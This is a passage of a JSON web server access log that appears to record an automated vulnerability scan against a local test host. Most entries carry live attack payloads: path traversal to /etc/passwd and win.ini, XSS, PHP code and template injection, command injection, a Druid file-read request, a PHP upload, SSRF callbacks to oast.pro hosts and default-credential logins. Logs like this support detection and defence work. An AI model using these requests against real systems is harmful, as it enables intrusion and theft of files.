HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/29 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gotoURL.asp?url=example.com&id=43569 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/printenv.pl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /node_modules/mqtt/test/helpers/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /update.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?s=captcha HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iam/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29N5Ef5BJDfGHUhMSvIBGXok3gp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download.do?file=../../../../config.text HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/30 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nuxeo/login.jsp/pwn$%7B31333333330+7%7D.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/login.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/29N5EkE95gJwSu2nddsJNYrF4KU/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /session HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?v=d HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-----------------------------154934846911423734231554128137\x0D\x0AContent-Disposition: form-data; name=\x22upload\x22; filename=\x2229N5EgbyxfdbnHqPQrDgdpvezbc.php\x22\x0D\x0AContent-Type: application/x-php\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------154934846911423734231554128137--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /clients/editclient.php?id=29N5EgbyxfdbnHqPQrDgdpvezbc&action=update HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"{\x22type\x22:\x22index\x22,\x22spec\x22:{\x22type\x22:\x22index\x22,\x22ioConfig\x22:{\x22type\x22:\x22index\x22,\x22firehose\x22:{\x22type\x22:\x22http\x22,\x22uris\x22:[\x22 file:///etc/passwd \x22]}},\x22dataSchema\x22:{\x22dataSource\x22:\x22sample\x22,\x22parser\x22:{\x22type\x22:\x22string\x22, \x22parseSpec\x22:{\x22format\x22:\x22regex\x22,\x22pattern\x22:\x22(.*)\x22,\x22columns\x22:[\x22a\x22],\x22dimensionsSpec\x22:{},\x22timestampSpec\x22:{\x22column\x22:\x22no_ such_ column\x22,\x22missingValue\x22:\x222010-01-01T00:00:00Z\x22}}}}},\x22samplerConfig\x22:{\x22numRows\x22:500,\x22timeoutMs\x22:15000}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /druid/indexer/v1/sampler?for=connect HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crowd/console/login.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/webcm?getpage=../html/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/31 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/ui/swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?u=http://ca2tuc8smpv1g2s80ca01ccri4thbja33.oast.pro/&href=http://ca2tuc8smpv1g2s80ca0bauihybz9swyu.oast.pro/&action=http://ca2tuc8smpv1g2s80ca09d56zzwjwkyho.oast.pro/&host=ca2tuc8smpv1g2s80ca07x57urrb9mmzp.oast.pro&http_host=ca2tuc8smpv1g2s80ca0ix84a4uhsb41z.oast.pro&email=root@ca2tuc8smpv1g2s80ca0bw79ids36r89y.oast.pro&url=http://ca2tuc8smpv1g2s80ca03y88tyb1cfpeh.oast.pro/&load=http://ca2tuc8smpv1g2s80ca0juawkzr7655rc.oast.pro/&preview=http://ca2tuc8smpv1g2s80ca0os9roxfqp6w33.oast.pro/&target=http://ca2tuc8smpv1g2s80ca0hxe9ud18qrdqd.oast.pro/&proxy=http://ca2tuc8smpv1g2s80ca01ia16mbxn8dfk.oast.pro/&from=http://ca2tuc8smpv1g2s80ca0tugnm5o5jjpks.oast.pro/&src=http://ca2tuc8smpv1g2s80ca09zu3ej7u5zxgh.oast.pro/&ref=http://ca2tuc8smpv1g2s80ca0uphns4uyoi9i8.oast.pro/&referrer=http://ca2tuc8smpv1g2s80ca0kddju9zmrcbu8.oast.pro/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfcache.map HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/29N5EkE95gJwSu2nddsJNYrF4KU/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /build.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logos_clients/1.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/weathermap/editor.php?plug=0&mapname=poc.conf&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /package.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/32 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"new_login_session_management=1&languageChoice=1&authUser=admin&clearPass=pass&languageChoice=10","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/ui/index HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /search/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", 